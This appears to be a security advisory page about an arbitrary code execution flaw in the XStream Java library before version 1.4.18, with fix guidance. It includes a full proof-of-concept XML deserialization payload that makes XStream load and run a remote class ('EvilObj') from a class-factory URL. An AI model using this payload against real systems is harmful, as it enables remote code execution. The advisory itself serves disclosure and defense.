Arbitrary Code Execution Affecting com.thoughtworks.xstream:xstream Open this link in a new tab package, versions [,1.4.18)


0.0
high
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    High

  • Scope

    Changed

  • Confidentiality

    High

  • Integrity

    High

  • Availability

    High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569181

  • published

    24 Aug 2021

  • disclosed

    24 Aug 2021

  • credit

    wh1t3p1g

How to fix?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
      <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
        <parsedMessage>true</parsedMessage>
        <soapVersion>SOAP_11</soapVersion>
        <bodyParts/>
        <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
          <attachmentsInitialized>false</attachmentsInitialized>
          <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
            <soapPart/>
            <mm>
              <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                <aliases class='com.sun.jndi.toolkit.dir.ContextEnumerator'>
                  <children class='javax.naming.directory.BasicAttribute$ValuesEnumImpl'>
                    <list class='com.sun.xml.internal.dtdparser.SimpleHashtable'>
                      <current>
                        <hash>1</hash>
                        <key class='javax.naming.Binding'>
                          <name>ysomap</name>
                          <isRel>false</isRel>
                            <boundObj class='com.sun.jndi.ldap.LdapReferralContext'>
                              <refCtx class='javax.naming.spi.ContinuationDirContext'>
                                <cpe>
                                  <stackTrace/>
                                  <suppressedExceptions class='java.util.Collections$UnmodifiableRandomAccessList' resolves-to='java.util.Collections$UnmodifiableList'>
                                    <c class='list'/>
                                    <list reference='../c'/>
                                  </suppressedExceptions>
                                  <resolvedObj class='javax.naming.Reference'>
                                    <className>EvilObj</className>
                                    <addrs/>
                                    <classFactory>EvilObj</classFactory>
                                    <classFactoryLocation>http://127.0.0.1:1099/</classFactoryLocation>
                                  </resolvedObj>
                                  <altName class='javax.naming.CompoundName' serialization='custom'>
                                    <javax.naming.CompoundName>
                                      <properties/>
                                      <int>1</int>
                                      <string>ysomap</string>
                                    </javax.naming.CompoundName>
                                  </altName>
                                </cpe>
                              </refCtx>
                              <skipThisReferral>false</skipThisReferral>
                              <hopCount>0</hopCount>
                            </boundObj>
                        </key>
                      </current>
                      <currentBucket>0</currentBucket>
                      <count>0</count>
                      <threshold>0</threshold>
                    </list>
                  </children>
                  <currentReturned>true</currentReturned>
                  <currentChildExpanded>false</currentChildExpanded>
                  <rootProcessed>true</rootProcessed>
                  <scope>2</scope>
                </aliases>
              </it>
            </mm>
          </multiPart>
        </sm>
      </message>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
      <m__obj class='string'>test</m__obj>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
XStream xstream = new XStream();
xstream.fromXML(xml);